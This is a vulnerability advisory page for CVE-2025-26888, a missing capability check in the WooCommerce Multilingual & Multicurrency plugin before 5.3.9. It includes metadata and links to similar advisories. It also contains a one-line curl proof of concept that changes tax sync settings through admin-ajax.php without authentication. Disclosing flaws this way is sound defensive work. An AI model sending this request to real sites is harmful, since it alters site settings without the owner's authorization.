WooCommerce Multilingual & Multicurrency < 5.3.9 – Unauthenticated Tax Sync Settings Update | CVE 2025-26888 | Plugin Vulnerabilities

Description

The plugin is vulnerable to unauthorized access due to a missing capability check on a function. This makes it possible for unauthenticated attackers to update arbitrary tax sync settings

Proof of Concept

Requires the sitepress-multilingual-cms plugin active on the site.

curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' --data 'icl_ajx_action=icl_custom_tax_sync_options&icl_sync_tax[pa_some_parameter_name]=some_value'

Affects Plugins

woocommerce-multilingual

Fixed in 5.3.9

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/0201d430-1254-4b09-b7a0-1443861ddf42

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Rafie Muhammad

Verified

Yes

WPVDB ID

501a3352-7597-409a-aa30-0a2dd6e1592f

Timeline

Publicly Published

2025-04-09 (about 1 year ago)

Added

2025-04-15 (about 1 year ago)

Last Updated

2026-05-18 (about 6 days ago)

Other

Published

Title

Published

2023-11-24

Title

Booster for WooCommerce < 7.1.3 - Missing Authorization to Product Creation/Modification

Published

2024-03-07

Title

TeraWallet – Best WooCommerce Wallet System With Cashback Rewards, Partial Payment, Wallet Refunds < 1.4.11 - Missing Authorization to Authenticated (Subscriber+) User Email Export

Published

2024-01-24

Title

InstaWP Connect < 0.1.0.10 - Missing Authorization to Sensitive Information Dislcosure

Published

2025-01-18

Title

EMI Calculator <= 1.1 - Missing Authorization to Unauthenticated Settings Change

Published

2025-12-02

Title

WPS Bidouille < 1.33.2 - Missing Authorization